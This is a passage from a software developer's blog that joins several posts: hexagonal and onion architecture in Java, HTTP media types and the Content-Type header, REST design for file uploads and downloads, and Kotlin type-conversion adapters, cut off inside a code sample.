<p>This change only seems to be a small difference. However, for future requirements, we now have a specific location to handle incoming orders in our business layer. Otherwise, chances are high that with new requirements we leak more business logic into places where it should not be located.</p>
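<p>One benefit of this design is that both business rules can be checked without Kafka or a database. The following framework-free sketch uses plain constructors instead of Lombok and omits <span class="code">@Transactional</span>. The <span class="code">Order</span> class and the two interfaces are reduced to what the example needs and are assumptions about their shape, not the original implementation:</p>

```java
// Minimal stand-ins for the types used in this post (assumed shapes).
final class Order {
    private final String id;

    Order(String id) {
        this.id = id;
    }

    String getId() {
        return id;
    }
}

// Outgoing port for persisting orders.
interface SaveOrderPort {
    void saveOrder(Order order);
}

// Abstraction for the audit log.
interface AuditLog {
    void write(String message);
}

// The specific use case: everything that has to happen when a new order is retrieved.
final class NewOrderRetrievedUseCase {
    private final SaveOrderPort saveOrderPort;
    private final AuditLog auditLog;

    NewOrderRetrievedUseCase(SaveOrderPort saveOrderPort, AuditLog auditLog) {
        this.saveOrderPort = saveOrderPort;
        this.auditLog = auditLog;
    }

    void onNewOrderRetrieved(Order newOrder) {
        saveOrderPort.saveOrder(newOrder);
        auditLog.write("New order retrieved, id: " + newOrder.getId());
    }
}
```

<p>In a test, both collaborators can be replaced with simple in-memory implementations, for example two lists passed as <span class="code">saved::add</span> and <span class="code">log::add</span>.</p>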
<p>Leaks like this happen especially often with overly generic <em>create</em>, <em>save</em>/<em>update</em> and <em>delete</em> operations in the domain layer. So, try to be very specific when implementing business operations.</p>
<h1>Media types and the Content-Type header</h1>
<p>Michael Scharhag, 2021-10-06</p>
<p>A <em>Media type</em> (formerly known as <em>MIME type</em>) is an identifier for file formats and format contents. Media types are used by different internet technologies like e-mail or HTTP.</p>
<p>Media types consist of a <em>type</em> and a <em>subtype</em>. They can optionally contain a <em>suffix</em> and one or more <em>parameters</em>. Media types follow this syntax:</p>
<pre>
type "/" [tree "."] subtype ["+" suffix]* [";" parameter]
</pre>
<p>For example the media type for JSON documents is:</p>
<pre>
application/json</pre>
<p>It consists of the type <span class="code">application</span> with the subtype <span class="code">json</span>.</p>
<p>An HTML document with UTF-8 encoding can be expressed as:</p>
<pre>
text/html; charset=UTF-8</pre>
<p>Here we have the type <span class="code">text</span>, the subtype <span class="code">html</span> and a parameter <span class="code">charset=UTF-8</span> indicating UTF-8 character encoding.</p>
<p>A suffix can be used to specify the underlying format of a media type. For example, <a href="https://en.wikipedia.org/wiki/Scalable_Vector_Graphics" target="_blank">SVG images</a> use the media type:</p>
<pre>
image/svg+xml</pre>
<p>The type is <span class="code">image</span>, <span class="code">svg</span> is the subtype and <span class="code">xml</span> the suffix. The suffix tells us that the SVG file format is based on <a href="https://en.wikipedia.org/wiki/XML" target="_blank">XML</a>.</p>
<p>Note that subtypes can be organized in a hierarchical tree structure. For example, the binary format used by <a href="https://thrift.apache.org/" target="_blank">Apache Thrift</a> uses the following media type:</p>
<pre>
application/vnd.apache.thrift.binary</pre>
<p><em>vnd</em> is a standardized prefix that tells us this is a vendor specific media type.</p>
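<p>To make the parts of this syntax more tangible, here is a simplified parser sketch. <span class="code">ParsedMediaType</span> is a hypothetical name; the sketch treats everything after the last <em>+</em> as the suffix and does not handle quoted parameter values that contain a semicolon:</p>

```java
import java.util.LinkedHashMap;
import java.util.Locale;
import java.util.Map;

// Hypothetical, simplified media type parser.
final class ParsedMediaType {
    final String type;
    final String subtype;                  // includes a tree prefix such as "vnd." if present
    final String suffix;                   // null if the media type has no suffix
    final Map<String, String> parameters;  // parameter names are lower-cased

    private ParsedMediaType(String type, String subtype, String suffix, Map<String, String> parameters) {
        this.type = type;
        this.subtype = subtype;
        this.suffix = suffix;
        this.parameters = parameters;
    }

    static ParsedMediaType parse(String value) {
        String[] parts = value.split(";");
        String essence = parts[0].trim().toLowerCase(Locale.ROOT);
        int slash = essence.indexOf('/');
        if (slash <= 0 || slash == essence.length() - 1) {
            throw new IllegalArgumentException("Not a media type: " + value);
        }
        String type = essence.substring(0, slash);
        String rest = essence.substring(slash + 1);
        int plus = rest.lastIndexOf('+');
        String subtype = plus < 0 ? rest : rest.substring(0, plus);
        String suffix = plus < 0 ? null : rest.substring(plus + 1);

        Map<String, String> parameters = new LinkedHashMap<>();
        for (int i = 1; i < parts.length; i++) {
            String parameter = parts[i].trim();
            int equals = parameter.indexOf('=');
            if (equals > 0) {
                String name = parameter.substring(0, equals).trim().toLowerCase(Locale.ROOT);
                parameters.put(name, parameter.substring(equals + 1).trim());
            }
        }
        return new ParsedMediaType(type, subtype, suffix, parameters);
    }
}
```

<p>For <em>image/svg+xml</em> this yields the type <span class="code">image</span>, the subtype <span class="code">svg</span> and the suffix <span class="code">xml</span>. For <em>text/html; charset=UTF-8</em> the <span class="code">charset</span> parameter ends up in the parameter map.</p>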
<h2>The Content-Type header</h2>
<p>With HTTP any message that contains an entity-body should include a <em>Content-Type</em> header to define the media type of the body.</p>
<p>The <a href="https://datatracker.ietf.org/doc/html/rfc2616#section-7.2.1" target="_blank">RFC </a>says:</p>
<blockquote>
<p>Any HTTP/1.1 message containing an entity-body SHOULD include a Content-Type header field defining the media type of that body. If and only if the media type is not given by a Content-Type field, the recipient MAY attempt to guess the media type via inspection of its content and/or the name extension(s) of the URI used to identify the resource. If the media type remains unknown, the recipient SHOULD treat it as type "application/octet-stream".</p>
</blockquote>
<p>The RFC allows clients to guess the media type if the Content-Type header is not present. However, guessing should be avoided.</p>
<p>Guessing the media type of a piece of data is called <a href="https://en.wikipedia.org/wiki/Content_sniffing" target="_blank"><em>Content sniffing</em></a> (or MIME-sniffing). This practice was (and sometimes still is) used by web browsers and has been the source of multiple security vulnerabilities. To explicitly tell browsers not to guess certain media types, the following header can be added:</p>
<pre>
X-Content-Type-Options: nosniff</pre>
<p>Note that the <em>Content-Type</em> header always contains the media type of the original resource, before any content encoding is applied. Content encoding (like <em>gzip</em> compression) is indicated by the <em>Content-Encoding</em> header.</p>
<h1>From layers to onions and hexagons</h1>
<p>Michael Scharhag, 2021-09-20</p>
<p>In this post we will explore the transition from a classic layered software architecture to a hexagonal architecture. The <a href="https://en.wikipedia.org/wiki/Hexagonal_architecture_(software)" target="_blank">hexagonal architecture</a> (also called ports and adapters architecture) is a design pattern to create loosely coupled application components.</p>
<p>This post was inspired by a German article from Silas Graffy called <a href="https://www.maibornwolff.de/blog/von-schichten-zu-ringen-hexagonale-architekturen-erklaert" target="_blank">Von Schichten zu Ringen - Hexagonale Architekturen erklärt</a>.</p>
<h2>Classic layers</h2>
<p><a href="https://en.wikipedia.org/wiki/Multitier_architecture" target="_blank">Layering</a> is one of the most widely known techniques to break apart complicated software systems. It has been promoted in many popular books, like <a href="https://www.amazon.com/-/en/dp/0321127420" target="_blank"><em>Patterns of Enterprise Application Architecture</em></a> by Martin Fowler.</p>
<p>Layers allow us to build software on top of a lower-level layer without knowing the details of any of the lower-level layers. In an ideal world we can even replace lower-level layers with different implementations. While the number of layers can vary, we mostly see three or four layers in practice.</p>
<p>Here, we have an example diagram of a three layer architecture:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-01.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-01.jpg" style="width: 100%; max-width: 350px" /></a></p>
<p>The <em>presentation</em> layer contains components related to user (or API) interfaces. In the <em>domain</em> layer we find the logic related to the problem the application solves. The <em>database</em> access layer is responsible for database interaction.</p>
<p>The dependency direction is from top to bottom. The code in the <em>presentation</em> layer depends on code in the <em>domain</em> layer, which in turn depends on code located in the <em>database</em> layer.</p>
<p>As an example we will examine a simple use-case: <em>Creation of a new user</em>. Let's add related classes to the layer diagram:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-02.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-02.jpg" style="width: 100%; max-width: 375px" /></a></p>
<p>In the <em>database</em> layer we have a <span class="code">UserDao</span> class with a <span class="code">saveUser(..)</span> method that accepts a <span class="code">UserEntity</span> object. <span class="code">UserEntity</span> might contain methods required by <span class="code">UserDao</span> for interacting with the database. With ORM frameworks (like <a href="https://en.wikipedia.org/wiki/Jakarta_Persistence" target="_blank">JPA</a>) <span class="code">UserEntity</span> might contain information related to object-relational mapping.</p>
<p>The domain layer provides a <span class="code">UserService</span> and a <span class="code">User</span> class. Both might contain domain logic. <span class="code">UserService</span> interacts with <span class="code">UserDao</span> to save a <span class="code">User</span> in the database. <span class="code">UserDao</span> does not know about the <span class="code">User</span> object, so <span class="code">UserService</span> needs to convert <span class="code">User</span> to <span class="code">UserEntity</span> before calling <span class="code">UserDao.saveUser(..)</span>.</p>
<p>In the presentation layer we have a <span class="code">UserController</span> class which interacts with the domain layer using the <span class="code">UserService</span> and <span class="code">User</span> classes. The presentation layer also has its own class to represent a user: <span class="code">UserDto</span> might contain utility methods to format field values for presentation in a user interface.</p>
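<p>Expressed in code, the lower two layers of this classic setup could look roughly like the following sketch. The class names are taken from the diagram; the <span class="code">name</span> and <span class="code">email</span> fields and the in-memory list that stands in for a database table are assumptions made only to keep the example self-contained.</p>

```java
import java.util.ArrayList;
import java.util.List;

// --- database layer ---
final class UserEntity {
    final String name;   // assumed field
    final String email;  // assumed field

    UserEntity(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

class UserDao {
    // Stands in for a real database table
    private final List<UserEntity> rows = new ArrayList<>();

    void saveUser(UserEntity entity) {
        rows.add(entity);
    }

    List<UserEntity> findAll() {
        return rows;
    }
}

// --- domain layer ---
final class User {
    final String name;
    final String email;

    User(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

class UserService {
    // Direct dependency on a class of the database layer
    private final UserDao userDao;

    UserService(UserDao userDao) {
        this.userDao = userDao;
    }

    void createUser(User user) {
        // The domain layer has to convert its own object
        // into the type the database layer understands
        userDao.saveUser(new UserEntity(user.name, user.email));
    }
}
```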
<h2>What is the problem with this?</h2>
<p>We have some potential problems to discuss here.</p>
<p>First, we can easily get the impression that the database is the most important part of the system as all other layers depend on it. However, in modern software development we no longer start with creating huge ER-diagrams for the database layer. Instead, we should (and usually do) focus on the business domain.</p>
<p>As the domain layer depends on the database layer, the domain layer needs to convert its own objects (<span class="code">User</span>) to objects the database layer knows how to use (<span class="code">UserEntity</span>). So we have code that deals with database layer specific classes located in the domain layer. Ideally, we want the domain layer to focus on domain logic and nothing else.</p>
<p>The domain layer is directly using implementation classes from the database layer. This makes it hard to replace the database layer with different implementations. Even if we do not want to plan for replacing the database with a different storage technology this is important. Think of replacing the database layer with mocks for unit testing or using in-memory databases for local development.</p>
<h2>Abstraction with interfaces</h2>
<p>The last problem mentioned can be solved by introducing interfaces. The obvious and quite common solution is to add an interface in the database layer. Higher level layers use the interface and do not depend on implementation classes.</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-03.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-03.jpg" style="width: 100%; max-width: 375px" /></a></p>
<p>Here we split the <span class="code">UserDao</span> class into an interface (<span class="code">UserDao</span>) and an implementation class (<span class="code">UserDaoImpl</span>). <span class="code">UserService</span> only uses the <span class="code">UserDao</span> interface. This abstraction gives us more flexibility as we can now change <span class="code">UserDao</span> implementations in the database layer.</p>
<p>However, from the layer perspective nothing changed. We still have code related to the database layer in our domain layer.</p>
<p>Now, we can do a little bit of magic by moving the interface into the domain layer:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-04.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-04.jpg" style="width: 100%; max-width: 375px" /></a></p>
<p>Note we did not just move the <span class="code">UserDao</span> interface. As <span class="code">UserDao</span> is now part of the domain layer, it uses domain classes (<span class="code">User</span>) instead of database related classes (<span class="code">UserEntity</span>).</p>
<p>This little change reverses the dependency direction between the domain and database layers. The domain layer no longer depends on the database layer. Instead, the database layer depends on the domain layer as it requires access to the <span class="code">UserDao</span> interface and the <span class="code">User</span> class. The database layer is now responsible for the conversion between <span class="code">User</span> and <span class="code">UserEntity</span>.</p>
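<p>The reversed dependency direction can be sketched in Java as follows. Again, the class names come from the diagram, while the fields and the in-memory list inside <span class="code">UserDaoImpl</span> are assumptions used only to keep the example small and runnable.</p>

```java
import java.util.ArrayList;
import java.util.List;

// --- domain layer: no reference to any database class ---
final class User {
    final String name;   // assumed field
    final String email;  // assumed field

    User(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

// The interface lives in the domain layer and speaks in domain types
interface UserDao {
    void saveUser(User user);
}

class UserService {
    private final UserDao userDao;

    UserService(UserDao userDao) {
        this.userDao = userDao;
    }

    void createUser(User user) {
        userDao.saveUser(user); // no conversion needed here anymore
    }
}

// --- database layer: depends on the domain layer ---
final class UserEntity {
    final String name;
    final String email;

    UserEntity(String name, String email) {
        this.name = name;
        this.email = email;
    }
}

class UserDaoImpl implements UserDao {
    // Stands in for a real database table
    final List<UserEntity> rows = new ArrayList<>();

    @Override
    public void saveUser(User user) {
        // The conversion between User and UserEntity now happens here
        rows.add(new UserEntity(user.name, user.email));
    }
}
```

<p>Because <span class="code">UserService</span> only knows the interface, a unit test can pass in a trivial replacement, for example <span class="code">new UserService(savedUsers::add)</span> with a plain list of <span class="code">User</span> objects.</p>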
<h2>In and out</h2>
<p>While the dependency direction has been changed the call direction stays the same:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-05.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-05.jpg" style="width: 100%; max-width: 350px" /></a></p>
<p>The domain layer is the center of the application. We can say that the presentation layer calls <em>in</em> to the domain layer while the domain layer calls <em>out</em> to the database layer.</p>
<p>As a next step, we can split layers into more specific components. For example:</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-06.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-06.jpg" style="width: 100%; max-width: 375px" /></a></p>
<p>This is what hexagonal architecture (also called ports and adapters) is about.</p>
<p>We no longer have <em>layers</em> here. Instead, we have the application domain in the center and so-called adapters. Adapters provide additional functionality like user interfaces or database access. Some adapters call <em>in</em> to the domain center (here: <em>UI</em> and <em>REST API</em>) while others are <em>outgoing</em> adapters called by the domain center via interfaces (here: <em>database</em>, <em>message queue</em> and <em>E-Mail</em>).</p>
<p>This allows us to separate pieces of functionality into different modules/packages while the domain logic does not have any outside dependencies.</p>
<h2>The onion architecture</h2>
<p>From the previous step it is easy to move to the onion architecture (sometimes also called clean architecture).</p>
<p style="text-align: center"><a href="https://www.mscharhag.com/files/2021/hex-arch-07.jpg" target="_blank"><img alt="" src="https://www.mscharhag.com/files/2021/hex-arch-07.jpg" style="width: 100%; max-width: 450px" /></a></p>
<p>The <em>domain</em> center is split into the <em>domain model</em> and <em>domain services</em> (sometimes called <em>use cases</em>). <em>Application services</em> contain incoming and outgoing adapters. On the outermost layer we locate infrastructure elements like databases or message queues.</p>
<h2>What to remember?</h2>
<p>We looked at the transition from a classic layered architecture to more modern architecture approaches. While the details of hexagonal architecture and onion architecture might vary, both share important parts:</p>
<ul>
<li>The application domain is the core part of the application without any external dependencies. This allows easy testing and modification of domain logic.</li>
<li>Adapters located around the domain logic talk with external systems. These adapters can easily be replaced by different implementations without any changes to the domain logic.</li>
<li>The dependency direction always goes from the outside (adapters, external dependencies) to the inside (domain logic).</li>
<li>The call direction can be <em>in</em> and <em>out</em> of the domain center. At least for calling <em>out</em> of the domain center, we need interfaces to ensure the correct dependency direction.</li>
</ul>
<h2>Further reading</h2>
<ul>
<li><a href="https://www.amazon.com/Clean-Architecture-Craftsmans-Software-Structure/dp/0134494164" target="_blank">Clean Architecture: A Craftsman's Guide to Software Structure and Design</a> by Robert C. Martin</li>
<li><a href="https://blog.cleancoder.com/uncle-bob/2012/08/13/the-clean-architecture.html" target="_blank">The Clean Architecture</a> by Robert C. Martin</li>
<li><a href="https://jeffreypalermo.com/2008/07/the-onion-architecture-part-1" target="_blank">The Onion Architecture</a> by Jeffrey Palermo</li>
</ul>
<h1>File down- and uploads in RESTful web services</h1>
<p>Michael Scharhag, published 2021-07-28, updated 2021-09-27</p>
<p>Usually we use standard data exchange formats like JSON or XML with REST web services. However, many REST services have at least some operations that can be hard to fulfill with just JSON or XML. Examples are uploads of product images, data imports using uploaded CSV files or generation of downloadable PDF reports.</p>
<p>In this post we focus on those operations, which are often categorized as file down- and uploads. This categorization is a bit fuzzy as sending a simple JSON document can also be seen as a (JSON) file upload operation.</p>
<h2>Think about the operation you want to express</h2>
<p>A common mistake is to focus on the specific file format that is required for the operation. Instead, we should think about the operation we want to express. The file format just decides the <a href="https://en.wikipedia.org/wiki/Media_type" target="_blank">Media Type</a> used for the operation.</p>
<p>For example, assume we want to design an API that lets users upload an avatar image to their user account.</p>
<p>Here, it is usually a good idea to separate the avatar image from the user account resource for various reasons:</p>
<ul>
<li>The avatar image is unlikely to change so it might be a good candidate for caching. On the other hand, the user account resource might contain things like the <em>last login</em> date which changes frequently.</li>
<li>Not all clients accessing the user account might be interested in the avatar image. So, bandwidth can be saved.</li>
<li>For clients it is often preferable to load images separately (think of web applications using <span class="code"><img></span> tags).</li>
</ul>
<p>The user account resource might be accessible via:</p>
<pre>
/users/<user-id></pre>
<p>We can come up with a simple sub-resource representing the avatar image:</p>
<pre>
/users/<user-id>/avatar</pre>
<p>Uploading an avatar is a simple replace operation which can be expressed via PUT:</p>
<pre>
PUT /users/<user-id>/avatar
Content-Type: image/jpeg
<image data>
</pre>
<p>In case a user wants to delete their avatar image, we can use a simple DELETE operation:</p>
<pre>
DELETE /users/<user-id>/avatar
</pre>
<p>And of course clients need a way to show the avatar image. So, we can provide a download operation with GET:</p>
<pre>
GET /users/<user-id>/avatar
</pre>
<p>which returns</p>
<pre>
HTTP/1.1 200 OK
Content-Type: image/jpeg
<image data>
</pre>
<p>In this simple example we use a new sub-resource with common update, delete, get operations. The only difference is we use an image media type instead of JSON or XML.</p>
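<p>On the client side, these three operations map directly to plain HTTP requests. The following sketch builds them with the <span class="code">java.net.http</span> API that ships with Java 11 and later. The class name <span class="code">AvatarRequests</span> and the base URI passed to it are placeholders; sending the requests with an <span class="code">HttpClient</span> and handling the responses is left out.</p>

```java
import java.net.URI;
import java.net.http.HttpRequest;

// Hypothetical helper that only builds the requests shown above
final class AvatarRequests {
    private final URI baseUri; // placeholder, e.g. https://api.example.com

    AvatarRequests(URI baseUri) {
        this.baseUri = baseUri;
    }

    // PUT replaces the avatar; the media type describes the body
    HttpRequest upload(String userId, byte[] jpegBytes) {
        return HttpRequest.newBuilder(avatarUri(userId))
                .header("Content-Type", "image/jpeg")
                .PUT(HttpRequest.BodyPublishers.ofByteArray(jpegBytes))
                .build();
    }

    HttpRequest delete(String userId) {
        return HttpRequest.newBuilder(avatarUri(userId))
                .DELETE()
                .build();
    }

    HttpRequest download(String userId) {
        return HttpRequest.newBuilder(avatarUri(userId))
                .header("Accept", "image/jpeg")
                .GET()
                .build();
    }

    private URI avatarUri(String userId) {
        return baseUri.resolve("/users/" + userId + "/avatar");
    }
}
```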
<p>Let's look at a different example.</p>
<p>Assume we provide an API to manage product data. We want to extend this API with an option to import products from an uploaded CSV file. Instead of thinking about file uploads we should think about a way to express a <em>product import</em> operation.</p>
<p>Probably the simplest approach is to send a POST request to a separate resource:</p>
<pre>
POST /product-import
Content-Type: text/csv
<csv data>
</pre>
<p>Alternatively, we can also see this as a <em>bulk</em> operation for products. As we learned in another post about <a href="https://www.mscharhag.com/api-design/bulk-and-batch-operations" target="_blank">bulk operations with REST</a>, the PATCH method is a possible way to express a bulk operation on a collection. In this case, the CSV document describes the desired changes to the product collection.</p>
<p>For example:</p>
<pre>
PATCH /products
Content-Type: text/csv
action,id,name,price
create,,Cool Gadget,3.99
create,,Nice cap,9.50
delete,42,,
</pre>
<p>This example creates two new products and deletes the product with id <em>42</em>.</p>
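<p>On the server side, the CSV body of such a PATCH request has to be translated into individual changes. Here is a minimal sketch of that step. It assumes exactly the four-column layout from the example above and no quoted fields; a real service would more likely use a CSV library. <span class="code">ProductChange</span> and <span class="code">ProductCsvParser</span> are hypothetical names.</p>

```java
import java.math.BigDecimal;
import java.util.ArrayList;
import java.util.List;

// One line of the CSV document; empty columns become null
final class ProductChange {
    final String action;
    final Long id;
    final String name;
    final BigDecimal price;

    ProductChange(String action, Long id, String name, BigDecimal price) {
        this.action = action;
        this.id = id;
        this.name = name;
        this.price = price;
    }
}

final class ProductCsvParser {

    static List<ProductChange> parse(String csv) {
        List<ProductChange> changes = new ArrayList<>();
        String[] lines = csv.split("\\R");
        // Start at 1 to skip the header line (action,id,name,price)
        for (int i = 1; i < lines.length; i++) {
            if (lines[i].isBlank()) {
                continue;
            }
            // The limit -1 keeps trailing empty columns, e.g. in "delete,42,,"
            String[] columns = lines[i].split(",", -1);
            if (columns.length != 4) {
                throw new IllegalArgumentException(
                        "Line " + (i + 1) + ": expected 4 columns but got " + columns.length);
            }
            changes.add(new ProductChange(
                    columns[0],
                    columns[1].isEmpty() ? null : Long.valueOf(columns[1]),
                    columns[2].isEmpty() ? null : columns[2],
                    columns[3].isEmpty() ? null : new BigDecimal(columns[3])));
        }
        return changes;
    }
}
```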
<p>Processing file uploads can take a considerable amount of time. So think about designing it as an <a href="https://www.mscharhag.com/api-design/rest-asynchronous-operations" target="_blank">asynchronous REST operation</a>.</p>
<h2>Mixing files and metadata</h2>
<p>In some situations we might need to attach additional metadata to a file. For example, assume we have an API where users can upload holiday photos. Besides the actual image data a photo might also contain a description, a location where it was taken and more.</p>
<p>Here, I would (again) recommend using two separate operations for similar reasons as stated in the previous section with the avatar image. Even if the situation is a bit different here (the data is directly linked to the image) it is usually the simpler approach.</p>
<p>In this case, we can first create a photo resource by sending the actual image:</p>
<pre>
POST /photos
Content-Type: image/jpeg
<image data></pre>
<p>As a response, we get:</p>
<pre>
HTTP/1.1 201 Created
Location: /photos/123</pre>
<p>After that, we can attach additional metadata to the photo:</p>
<pre>
PUT /photos/123/metadata
Content-Type: application/json
{
"description": "Nice shot of a beach in hawaii",
"location": "hawaii",
"filename": "hawaii-beach.jpg"
}
</pre>
<p>Of course we can also design it the other way around and send the metadata before the image.</p>
<h2>Embedding Base64 encoded files in JSON or XML</h2>
<p>In case splitting file content and metadata into separate requests is not possible, we can embed files into JSON / XML documents using <a href="https://en.wikipedia.org/wiki/Base64" target="_blank">Base64 encoding</a>. With Base64 encoding we can convert binary formats to a text representation which can be integrated in other text based formats, like JSON or XML.</p>
<p>An example request might look like this:</p>
<pre>
POST /photos
Content-Type: application/json
{
"width": "1280",
"height": "920",
"filename": "funny-cat.jpg",
"image": "TmljZSBleGFt...cGxlIHRleHQ="
}</pre>
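<p>In Java, the encoding and decoding step is covered by <span class="code">java.util.Base64</span>. The following sketch shows both directions. <span class="code">PhotoJson</span> is a hypothetical helper, and the JSON is assembled by hand without any escaping only to avoid a library dependency in the example; real code should use a JSON library.</p>

```java
import java.util.Base64;

// Hypothetical helper for illustration
final class PhotoJson {

    // Client side: turn the binary image into text and embed it
    static String toJson(String filename, byte[] imageBytes) {
        String encoded = Base64.getEncoder().encodeToString(imageBytes);
        // No JSON escaping here; assumes a harmless filename
        return "{\"filename\": \"" + filename + "\", \"image\": \"" + encoded + "\"}";
    }

    // Server side: turn the text from the "image" field back into bytes
    static byte[] decodeImage(String base64) {
        return Base64.getDecoder().decode(base64);
    }
}
```

<p>Keep in mind that Base64 represents every three bytes of input with four characters, so the embedded file grows by roughly one third.</p>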
<h2>Mixing media-types with multipart requests</h2>
<p>Another possible approach to transfer image data and metadata in a single request / response is to use <a href="https://www.w3.org/Protocols/rfc1341/7_2_Multipart.html">multipart media types</a>.</p>
<p>Multipart media types require a <span class="code">boundary</span> parameter that is used as delimiter between different body parts. The following request consists of two body parts. The first one contains the image while the second part contains the metadata.</p>
<p>For example:</p>
<pre>
POST /photos
Content-Type: multipart/mixed; boundary=foobar
--foobar
Content-Type: image/jpeg
<image data>
--foobar
Content-Type: application/json
{
"width": "1280",
"height": "920",
"filename": "funny-cat.jpg"
}
--foobar--</pre>
<p>Unfortunately, multipart requests / responses are often hard to work with. For example, not every REST client might be able to construct these requests and it can be hard to verify responses in unit tests.</p>
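<p>To give an impression of what constructing such a request involves, here is a minimal sketch that assembles a <span class="code">multipart/mixed</span> body by hand. <span class="code">MultipartMixedBody</span> is a hypothetical class. It assumes that the boundary string never occurs inside any part and it only writes a <em>Content-Type</em> header per part.</p>

```java
import java.io.ByteArrayOutputStream;
import java.nio.charset.StandardCharsets;

// Hypothetical builder for illustration
final class MultipartMixedBody {
    private static final String CRLF = "\r\n";

    private final String boundary;
    private final ByteArrayOutputStream parts = new ByteArrayOutputStream();

    MultipartMixedBody(String boundary) {
        this.boundary = boundary;
    }

    MultipartMixedBody addPart(String contentType, byte[] content) {
        // Each part starts with "--" followed by the boundary
        write(parts, "--" + boundary + CRLF);
        // Part headers, then an empty line, then the part content
        write(parts, "Content-Type: " + contentType + CRLF + CRLF);
        parts.write(content, 0, content.length);
        write(parts, CRLF);
        return this;
    }

    // Value for the Content-Type header of the whole request
    String contentTypeHeader() {
        return "multipart/mixed; boundary=" + boundary;
    }

    byte[] build() {
        ByteArrayOutputStream body = new ByteArrayOutputStream();
        byte[] soFar = parts.toByteArray();
        body.write(soFar, 0, soFar.length);
        // The closing delimiter has an additional trailing "--"
        write(body, "--" + boundary + "--" + CRLF);
        return body.toByteArray();
    }

    private static void write(ByteArrayOutputStream out, String text) {
        byte[] bytes = text.getBytes(StandardCharsets.US_ASCII);
        out.write(bytes, 0, bytes.length);
    }
}
```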
<h3><em>Interested in more REST related articles? Have a look at my <a href="https://www.mscharhag.com/p/rest-api-design" target="_blank">REST API design page</a>.</em></h3>
<h1>Kotlin: Type conversion with adapters</h1>
<p>Michael Scharhag, published 2021-06-27, updated 2021-12-14</p>
<p>In this post we will learn how we can use Kotlin extension functions to provide a simple and elegant type conversion mechanism.</p>
<p>Maybe you have used <a href="https://sling.apache.org/documentation.html" target="_blank">Apache Sling</a> before. In this case, you are probably familiar with <a href="https://sling.apache.org/documentation/the-sling-engine/adapters.html" target="_blank">Sling's usage of adapters</a>. We will implement a very similar approach in Kotlin.</p>
<h2>Creating an extension function</h2>
<p>With Kotlin's extension functions we can add methods to existing classes. The following declaration adds an <span class="code">adaptTo()</span> method to all subtypes of <span class="code">Any</span>.</p>
<pre class="brush: java">
inline fun <reified T : Any> Any.adaptTo(): T {
..
}
</pre>
<p>The generic parameter <span class="code">T</span> specifies the target type that should be returned by the method. We keep the method body empty for the moment.</p>
<p>Converting an object of type <span class="code">A</span> to another object of type <span class="code">B</span> will look like this with our new method:</p>
<pre class="brush: java">
val a = A("foo")
val b = a.adaptTo<B>()</pre>
<h2>Providing conversion rules with adapters</h2>
<p>In order to implement the <span class="code">adaptTo()</span> method we need a way to define conversion rules.</p>
<p>We use a simple <span class="code">Adapter</span> interface for this:</p>
<pre class="brush: java">
import kotlin.reflect.KClass

interface Adapter {
    fun <T : Any> canAdapt(from: Any, to: KClass<T>): Boolean
    fun <T : Any> adaptTo(from: Any, to: KClass<T>): T
}</pre>
<p><span class="code">canAdapt(..)</span> returns <span class="code">true</span> when the implementing class is able to convert the <span class="code">from</span> object to type <span class="code">to</span>.</p>
<p><span class="code">adaptTo(..)</span> performs the actual conversion and returns an object of type <span class="code">to</span>.</p>
<h2>Searching for an appropriate adapter</h2>
<p>Our <span class="code">adaptTo()</span> extension function needs a way to access available adapters. So, we create a simple list that stores our adapter implementations:</p>
<pre class="brush: java">
val adapters = mutableListOf<Adapter>()
</pre>
<p>Within the extension function we can now search the <span class="code">adapters</span> list for a suitable adapter:</p>
<pre class="brush: java">
inline fun <reified T : Any> Any.adaptTo(): T {
    val adapter = adapters.find { it.canAdapt(this, T::class) }
        ?: throw NoSuitableAdapterFoundException(this, T::class)
    return adapter.adaptTo(this, T::class)
}

class NoSuitableAdapterFoundException(from: Any, to: KClass<*>)
    : Exception("No suitable adapter found to convert $from to type $to")
</pre>
<p>If an adapter is found that can be used for the requested conversion we call <span class="code">adaptTo(..)</span> of the adapter and return the result. In case no suitable adapter is found a <span class="code">NoSuitableAdapterFoundException</span> is thrown.</p>
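<p>For comparison, the same lookup can be sketched in plain Java. Java has neither extension functions nor reified type parameters, so the conversion becomes a static method and the target type has to be passed explicitly as a <span class="code">Class</span> object. The <span class="code">Adapters</span> class and the use of <span class="code">IllegalStateException</span> are assumptions of this sketch and not part of the Kotlin example.</p>

```java
import java.util.ArrayList;
import java.util.List;

// Java counterpart of the Kotlin Adapter interface
interface Adapter {
    boolean canAdapt(Object from, Class<?> to);

    <T> T adaptTo(Object from, Class<T> to);
}

// Hypothetical registry; replaces the top-level adapters list
final class Adapters {
    private static final List<Adapter> ADAPTERS = new ArrayList<>();

    private Adapters() {
    }

    static void register(Adapter adapter) {
        ADAPTERS.add(adapter);
    }

    // Use the first registered adapter that supports the conversion
    static <T> T adapt(Object from, Class<T> to) {
        for (Adapter adapter : ADAPTERS) {
            if (adapter.canAdapt(from, to)) {
                return adapter.adaptTo(from, to);
            }
        }
        throw new IllegalStateException(
                "No suitable adapter found to convert " + from + " to type " + to);
    }
}
```

<p>A call then looks like <span class="code">Adapters.adapt(a, B.class)</span>, which is noticeably more verbose than the Kotlin version.</p>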
<h2>Example usage</h2>
<p>Assume we want to convert JSON strings to Kotlin objects using the <a href="https://github.com/FasterXML/jackson" target="_blank">Jackson JSON library</a>. A simple adapter might look like this:</p>
<pre class="brush: java">
class JsonToObjectAdapter : Adapter {
    private val objectMapper = ObjectMapper().registerModule(KotlinModule())

    override fun <T : Any> canAdapt(from: Any, to: KClass<T>) = from is String

    override fun <T : Any> adaptTo(from: Any, to: KClass<T>): T {
